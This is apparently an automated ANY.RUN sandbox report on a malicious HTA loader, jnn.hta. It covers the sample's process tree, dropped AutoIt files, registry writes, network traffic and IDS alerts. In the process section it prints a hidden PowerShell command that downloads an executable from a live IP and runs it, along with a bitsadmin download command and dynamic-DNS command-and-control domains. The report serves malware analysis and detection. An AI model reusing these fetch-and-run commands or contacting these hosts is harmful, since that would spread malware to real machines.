General Info

File name

jnn.hta

Full analysis
https://app.any.run/tasks/eb48ca2b-468e-4722-9e40-5b04796f96ff
Verdict
Malicious activity
Analysis date
3/14/2019, 12:27:22
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

loader

opendir

autoit

Indicators:

MIME:
text/html
File info:
HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
MD5

a6d6cdc59c6507424b2aedeff46afd2b

SHA1

3d9d1169a822d2c17ba8e8f1e42794246aea8958

SHA256

bd6b52e1365e898cf42a2ae281e897884c440bd33140a264f90e34d4aae3330a

SSDEEP

48:ZKpON1CTY1zH1aKL2slzhapoeddogoioFxBZoWk0uynk3nKpON1CTY1zH1aKL2s2:ZBvaY1zUMdzBZweoBvaY1zUMdzBZwjP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as-is for user acknowledgement. ANY.RUN does not guarantee the maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Downloads executable files from the Internet
  • powershell.exe (PID: 3036)
Uses BITSADMIN.EXE for downloading application
  • mshta.exe (PID: 3484)
Application was dropped or rewritten from another process
  • mdo.exe (PID: 2740)
  • Hmmmm.exe (PID: 3144)
Executes PowerShell scripts
  • mshta.exe (PID: 3484)
Downloads executable files from IP
  • powershell.exe (PID: 3036)
Executable content was dropped or overwritten
  • Hmmmm.exe (PID: 3144)
  • powershell.exe (PID: 3036)
Creates files in the user directory
  • powershell.exe (PID: 3036)
Drops AutoIt3 executable file
  • Hmmmm.exe (PID: 3144)
Dropped object may contain Bitcoin addresses
  • Hmmmm.exe (PID: 3144)
  • mdo.exe (PID: 2740)
Reads internet explorer settings
  • mshta.exe (PID: 3484)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.txt | Text - UTF-8 encoded (100%)
EXIF
HTML
ContentType:
text/html; charset=utf-8

Processes

Total processes
36
Monitored processes
5
Malicious processes
1
Suspicious processes
1

Behavior graph

mshta.exe (no specs)
  start → bitsadmin.exe (no specs)
  start → powershell.exe
    download and start → Hmmmm.exe
      drop and start → mdo.exe (no specs)

Process information

PID
3484
CMD
"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\jnn.hta"
Path
C:\Windows\System32\mshta.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft (R) HTML Application host
Version
8.00.7600.16385 (win7_rtm.090713-1255)

PID
2604
CMD
"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal Your Binded File Direct URL C:\Users\admin\AppData\Local\Temp\text.rtf
Path
C:\Windows\System32\bitsadmin.exe
Indicators
No indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147942487
Version:
Company
Microsoft Corporation
Description
BITS administration utility
Version
7.5.7600.16385 (win7_rtm.090713-1255)

PID
3036
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://141.136.44.78/jnn/jnn.exe','C:\Users\admin\AppData\Local\Temp\Hmmmm.exe');Start-Process C:\Users\admin\AppData\Local\Temp\Hmmmm.exe;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)

PID
3144
CMD
"C:\Users\admin\AppData\Local\Temp\Hmmmm.exe"
Path
C:\Users\admin\AppData\Local\Temp\Hmmmm.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version

PID
2740
CMD
"C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe" seg=muu
Path
C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe
Indicators
No indicators
Parent process
Hmmmm.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
AutoIt Team
Description
AutoIt v3 Script
Version
3, 3, 14, 5

Registry activity

Total events
1026
Read events
947
Write events
79
Delete events
0

Modification events

PID | Process | Operation | Key | Name | Value
3484 | mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
3484 | mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
3036 | powershell.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E | LanguageList | en-US
3036 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | 0
3036 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | 0
3036 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | 4294901760
3036 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | 4294901760
3036 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | 1048576
3036 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | %windir%\tracing
3036 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | 0
3036 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | 0
3036 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | 4294901760
3036 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | 4294901760
3036 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize | 1048576
3036 | powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory | %windir%\tracing
3036 | powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
3036 | powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
3144 | Hmmmm.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
3144 | Hmmmm.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1

Files activity

Executable files
2
Suspicious files
2
Text files
54
Unknown types
0

Dropped files

PID
Process
Filename
Type
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe
executable
MD5: c56b5f0201a3b3de53e561fe76912bfd
SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
3036
powershell.exe
C:\Users\admin\AppData\Local\Temp\Hmmmm.exe
executable
MD5: 22cf84a2fd381a3e383e65c933553fe1
SHA256: f62a182a1b4bd3f05ad0a639b3c5333990a6721dae6715ca6863e5e97d03a6e8
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\jkm.mp3
text
MD5: d764faade38682911bebbe4386b1ced4
SHA256: 27fa4da115127f99de35b1b6d2d241fd2e420ef7b14539bdaba45e33e5e0fdc4
2740
mdo.exe
C:\Users\admin\AppData\Local\Temp\88127361\YXUMT
text
MD5: 4d184c13b95c0c8d7cf644b9599bfed4
SHA256: 11ab9c4ce531bf94d9ffb7d242a41fae41ccb95e5fc9845c37d315e345b1e2ee
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\swq.xl
text
MD5: bc716dec0a405bd457fdb8aae6f880d4
SHA256: 521008524e25091b703c03e9c2b77388e24f0a1d89bf9c92d6ae453f8409c5b6
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\otp.ico
text
MD5: b84743ee3bd9c88c1bf27279e3e1e8cc
SHA256: ca56196b6f06c185cf87311e6e49eb71393a2d3967fb6ce1213a50f122295491
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\agf.mp3
text
MD5: 6b683766e31bf4c09e9606b132a0dcbb
SHA256: e73aef70c5db9d851d906b775e5aabe18888062af3faf53c0ec8cbca5b55e535
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\crc.bmp
text
MD5: c68768cbca85c691387a6dd545162283
SHA256: a2426d1643153e335aab55a4c8078e5dc42416142d9890ce9256e38b3ed63106
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\lph.xl
text
MD5: 602face6e7db59f16cdcf5c62a90fdf4
SHA256: bf42e5064bb8056a92711535f5c332500f7eb8351a6a7b076992e8d416445b83
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\ema.mp4
text
MD5: 19e2227a516dd3c03af3f429ad3cb801
SHA256: 6d7024ebd9a1ed69679795de3fd9cd93d8dc6cb00826822eed818b950ac1a403
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\vur.mp4
text
MD5: 20458011d0d339b9d638cd696b112533
SHA256: 771530df8d287e3b3f6c1ef14cfc8d2104cd158a7cf73c3cf12b6ac18565d515
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nkd.docx
text
MD5: 2a1f8daf674e9855126c8a9fe1f52f08
SHA256: a5ead5b669f54af308cd26009949e93dddf82721ecee453e7430639bb357f2e9
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\dnq.mp3
text
MD5: 1770257b1d796e2c229417b1dd44171e
SHA256: 7dc9ca12a862d2f7ec48117148bdb82c53e001db155628de552bb84c033ec40e
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\iwc.txt
text
MD5: c7329353c0cdcdfbfbc625a5121fa4c0
SHA256: 0f6005a715a87630f15de43e21f0e88c1da01b0f7a95b4a9be92fb8c5acc94d8
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\wlx.mp3
text
MD5: 3ef0a39f10a6a648a1776e7a5fd356d1
SHA256: 3c5db10a768ddb3694a65cdd7f662411759a1f1b3f6d33b30030ef2e1826cb29
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\iwd.docx
text
MD5: 52b5dd8a14c0e8b0c1348f1445c9605f
SHA256: 6dc83bc1f8f7e95296c7b70b68caa85056513f9e079137a843ef0fece00cd294
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\uvh.dat
text
MD5: f7d948d24ab00d59fda153ff1c40dad7
SHA256: 4f127ae7c1d45a796718fe442bf3eea86c3ed464a744fe20d2bcd244a843ee80
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bqc.pdf
text
MD5: dcc558713f18bb6f9f1986614670d633
SHA256: bd17ebfdfbbe72298118e4878256d0c306134dae72e24165ac9a9b96c5d7add3
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\ras.mp3
text
MD5: f6002c65bf5773dbb147aa34813138f3
SHA256: f5fbdc98a578ca4fa9c0c0b9838ebc188ee55efcd5812b2adec14c8bea1281b1
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\ucu.icm
text
MD5: d9b3eb6f6cbab2b8565265147411a2dd
SHA256: 16d9831ec31cc0696835b56cc4d7ff59cdd7f9380b0c12bc09fd8752d4b81223
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bkr.dat
text
MD5: 220534e4734ceeaae6bb055b4f0ce3cf
SHA256: 715de9c63dc88fd8f8e8540f067685ed620eff0178e16ae45853c454146287da
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\hrp.jpg
text
MD5: 520be58348f83651a6a77d7180c18f1e
SHA256: 81061cb012d827dc6805d6f38e46069478d5ef4062809609ecc64abf8d410a73
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\hlk.mp3
text
MD5: 6b00ad93325c0a65afbb84f495edd1a8
SHA256: b079e22683fcd46b416a695a4550b6e06db15bba197179d6120904f90ddadb88
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\jrx.docx
text
MD5: 5744c7f84cdad1fb1027e90e02e33530
SHA256: da8e37eb2f0c1ba7d298a184c8e263ff81d84f5ff5cb4e52541edff939a7ccbe
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\gbd.ppt
text
MD5: 8ca027526de874041007ebbf4749597b
SHA256: d8e049827a9f7eb38557f48c134bf30893bb798af61878c5a2d9b512fb69022c
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bos.dat
text
MD5: af76971543c4ce9db8caf2e571875f4f
SHA256: fdb64db0910f2ec413da1e4c18c505c2cce72231b1e5ef007605f78a6e5dd1d6
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\kgo.bmp
text
MD5: 4ef0cd3566b0cd7df92dd53b2615190b
SHA256: 86aa28bd8be550be1a2632f5ef119b78bf05efb98cf2316e777be81597c13c04
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\qaa.xl
text
MD5: f4712ebb85e9532888e8479a3d71448e
SHA256: 7ceea16b3c8eb2a38ed9e2bbb3462232f84c15dc66d4ab594ca1ff7c4d78954c
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\tlr.txt
text
MD5: 19edfee859fce71ce355d9d7d9f2fae3
SHA256: f719a2229c9929c53a9b10b59a2d1ac20b86758c0d360233e01942fa31e29409
3036
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1RONFJ4LCO6QOWSVIXYO.temp
––
MD5:  ––
SHA256:  ––
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nek.mp3
text
MD5: 6d9b924a1abf1d14608bcb066ddfe976
SHA256: fb433941510461f34c27bc1625e9d1a249e59a58132eb7a79ae0acf2bd0bcae7
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nok.pdf
text
MD5: 1db14f74f3914de40c93043a5e0fd2b2
SHA256: 65ddd15ca974d5116f734ad62735fa5d25a298f46653433134ab9b509b3f37ea
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\sqj.dat
text
MD5: 42c1de8aafab368ba22a4c3504a35c19
SHA256: fca18198a5e5ce7a7438d9a0d5eabf81314f1b13eec4e7ab6b962cdcc60f3bf9
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\wnm.txt
text
MD5: 9d871b45be406860726b7127c3a443cf
SHA256: eb6bd3df86e186d00fdea3207eb712de268e2d8fcef9af8a9e8b73899f89957f
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\wqh.ppt
text
MD5: 9c47a245493b6fdb09ebf389cbc97aa9
SHA256: b12245e281dbeb82ea9bd1574634a000ff06e26b14b377f82c820bd9f3af771a
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\pou.icm
text
MD5: 53ce9c11f69ede839689a93ea34b9201
SHA256: 3d08042dbb0a693dd4f838236e5d7f5e40f5667ba6b33adcd605f26610817627
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\ois.xl
text
MD5: 153b3b542f9cd17247811f7af364a980
SHA256: 7357786d348f08ab1e564efb68cc740e416828252c732721b44bf5f8b9f78303
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\cll.ppt
text
MD5: c3038bb5d678596a20440872bb278380
SHA256: 70dcfc1d30a96aa81ca89c308a379a7458534b6c9cd469c8641e71842c188370
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\tgo.ppt
text
MD5: da7da040fa0aac5f0434873dd878fd9c
SHA256: 57f6780fd5738439d4aa03b8f3aad8ceffaf99a2fb3e20b0e3916298ce09962a
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\qtl.docx
text
MD5: eb59a1fe851e768f7bd175cc24217aac
SHA256: 7e30c168edd43afe3e0fb0d21485cf025d5f226d948cb4e56b9f722ba2281365
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\lti.docx
text
MD5: 2571c4827b75254f512f67d569d4969e
SHA256: 72e1bf13d71df21ae55d248b6be66933e371cfc5bc7b0c33f4526f59e8f3f510
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\wmg.mp4
text
MD5: 930e1630892a35d1cbd8a595e972eb0b
SHA256: 958e318f9c7d99abc90e5a98aee4f8af8205dcf542e28ebca2ed8ca6835f7577
3484
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\warning[1]
image
MD5: 124a9e7b6976f7570134b7034ee28d2b
SHA256: 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\jvk.mp3
text
MD5: d9b7cc3f58da6d96c3dbfb4008b26eb9
SHA256: 29f324a7980e633b0052b5bdb634833cd094e5a631380fe6049fc6f6daa7a48c
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\urr.docx
text
MD5: 1d37dace5d0be9a4c90b71036ffb43b0
SHA256: 040ed3cba92ec70663baecd5e7f4859776669f4405be70f6db3066bf984d16f4
3484
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\warning[1]
image
MD5: 124a9e7b6976f7570134b7034ee28d2b
SHA256: 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nbb.icm
text
MD5: 9b65c9d1111c7e0640ce5900f01dbf05
SHA256: f4b0ae209225a3321acd8b5303b09d8ba245aa4250620d1407356faf82e6f800
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bum.pdf
text
MD5: feaeea7208f7a411e4cdc0e3286a11db
SHA256: 1df03709f122f14e2606e94bccb74b47c6c48a483c68a45ed446c06c0ca01965
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\dss.dat
text
MD5: c488c0eeaa4a77679f10a662945e5e4e
SHA256: db289b5f6cad00bf4b05ed3ba50825ac178119ea0d5f9f58f7a22f1ff670addf
3484
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\error[1]
text
MD5: 35fe91c2ac1ba0913cc617622b9eb43f
SHA256: 966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\seg=muu
text
MD5: 451111d03bca3331e4d1f2631f56c494
SHA256: 98ec9a9a42575a0626ebffaf344487e26118ebca0d837d218cfc4dc446f37102
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bje.ppt
text
MD5: f77626bd4356a4ae7252eccf68ee9f35
SHA256: 0e385f3f3122f4a5bfa9ddfe1214ef92ead6eea3c834540a88d19f5f23085958
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nkq.docx
text
MD5: 51c9b23e003e3e14f4659bc60d4be131
SHA256: 3adc7f290017eb28aa34e8cec227e781e25d180c3eb77e03b01211369980e0b6
3484
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\error[1]
html
MD5: 16aa7c3bebf9c1b84c9ee07666e3207f
SHA256: 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\lpr.mp4
text
MD5: 3576b5978b68394d98e25affd7225b83
SHA256: e182a17f5a6b486ff9410ecccbf9685bc5c54cf2ec314ae255040dabce04e895
3484
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\error[1]
text
MD5: 35fe91c2ac1ba0913cc617622b9eb43f
SHA256: 966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837
3036
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 0586db8ff5249ad980cec7bf2cbc3708
SHA256: df93e043bdfab9e6c36b353985e621a7a276756b52877aacdc5f36517009b4e2
3036
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1add71.TMP
binary
MD5: 0586db8ff5249ad980cec7bf2cbc3708
SHA256: df93e043bdfab9e6c36b353985e621a7a276756b52877aacdc5f36517009b4e2
3484
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\error[2]
html
MD5: 16aa7c3bebf9c1b84c9ee07666e3207f
SHA256: 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754

Find more information about the static content and download it at the full report

Network activity

HTTP(S) requests
2
TCP/UDP connections
18
DNS requests
17
Threats
15

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
3036 powershell.exe GET 200 141.136.44.78:80 http://141.136.44.78/jnn/jnn.exe LT executable suspicious
–– –– GET 200 141.136.44.78:80 http://141.136.44.78/jnn/jnn.exe LT executable suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
3036 powershell.exe 141.136.44.78:80 Vardas.lt, Uab LT suspicious
–– –– 141.136.44.78:80 Vardas.lt, Uab LT suspicious
–– –– 8.8.8.8:53 Google Inc. US whitelisted
–– –– 8.8.4.4:53 Google Inc. US whitelisted
–– –– 185.163.45.48:58887 MivoCloud SRL MD suspicious

DNS requests

Domain IP Reputation
kgentle777.hopto.org No response unknown
kgentle77.duckdns.org 185.163.45.48 malicious

Threats

PID Process Class Message
3036 powershell.exe A Network Trojan was detected ET INFO Executable Download from dotted-quad Host
3036 powershell.exe Potentially Bad Traffic ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
3036 powershell.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
3036 powershell.exe Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3036 powershell.exe Potentially Bad Traffic ET INFO SUSPICIOUS Dotted Quad Host MZ Response
–– –– A Network Trojan was detected ET INFO Executable Download from dotted-quad Host
–– –– Potentially Bad Traffic ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
–– –– Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
–– –– Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
–– –– Potentially Bad Traffic ET INFO SUSPICIOUS Dotted Quad Host MZ Response
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain

Debug output strings

No debug info.